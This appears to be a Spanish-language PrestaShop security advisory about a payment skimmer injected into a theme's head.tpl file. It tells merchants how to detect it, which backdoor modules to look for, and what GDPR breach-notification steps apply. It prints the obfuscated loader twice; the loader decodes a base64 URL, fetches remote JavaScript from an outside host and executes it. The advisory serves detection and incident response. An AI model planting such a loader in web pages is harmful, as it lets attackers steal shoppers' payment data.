Recientemente hemos identificado una amenaza de seguridad que afecta a algunas tiendas en línea del ecosistema PrestaShop. Se ha detectado un script malicioso ("digital skimmer") que podría haber provocado el robo de la información de pago de algunos de sus clientes.
¿Qué hace este digital skimmer?
Este malware funciona reemplazando los botones de pago legítimos en la página de pedido por botones fraudulentos. Cuando un cliente hace clic en uno de estos botones falsos, es redirigido a un formulario de pago falsificado destinado a capturar su información de pago.
El skimmer se carga simplemente a través de una etiqueta <script>, escrita directamente en el archivo _partials/head.tpl del tema activo de la tienda. Esto significa que el atacante pudo modificar un archivo de la tienda.
¿Cómo verificar si mi tienda está afectada?
En el front-office
Puede verificar el código de su front-office inspeccionando una página de su sitio (clic derecho, luego "inspeccionar"). Mire dentro de la etiqueta <script>, si encuentra el siguiente código, significa que su tienda está afectada:
<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>
Nota: La parte aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz cambia cada vez, pero la estructura del código permanece igual y la función atob() siempre se utiliza. Puede haber código antes o después (el skimmer intenta ocultarse siendo ligeramente diferente en cada tienda).
En su servidor
Para verificar en sus archivos:
1. Puede encontrar la misma etiqueta script en un archivo de su servidor. Conéctese a su servidor por FTP y navegue por la carpeta theme y luego la carpeta del tema activo > carpeta template > _partial > head.tpl. En este último archivo, haga clic derecho y luego "ver/editar", y busque la misma etiqueta:
<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>
2. También en sus archivos, si encuentra el módulo "mloader" o "simplefilemanager" bajo la carpeta "/modules/", entonces esto también significa que su tienda está afectada.
¿Qué hacer si mi tienda está afectada?
- Cambie las contraseñas para sus diferentes accesos (back-office, base de datos, FTP, SSH, sin olvidar actualizar el acceso a la base de datos en el archivo de configuración de PrestaShop).
- Revise sus logs para ver si se han exfiltrado datos de sus clientes. En caso afirmativo, deberá presentar una denuncia ante la policía y contactar con la CNIL.
- Consulte a un profesional de la seguridad informática para que revise la integridad de su sitio. Solo un profesional puede garantizar la seguridad de su tienda.
¿Debo informar a mis clientes?
En su calidad de responsables del tratamiento en el sentido del RGPD, le corresponde evaluar la existencia de una violación de datos y, en su caso, proceder a las notificaciones requeridas. De acuerdo con los artículos 33 y 34 del RGPD, cualquier violación que pueda suponer un riesgo para los derechos y libertades debe notificarse a la CNIL en un plazo de 72 horas, y a las personas afectadas en caso de riesgo elevado (una guía práctica está disponible en el sitio web de la CNIL).
⚠️ En este momento, le recomendamos encarecidamente realizar una revisión completa de la seguridad de sus tiendas PrestaShop y asegurarse de que ninguna de ellas haya sido comprometida.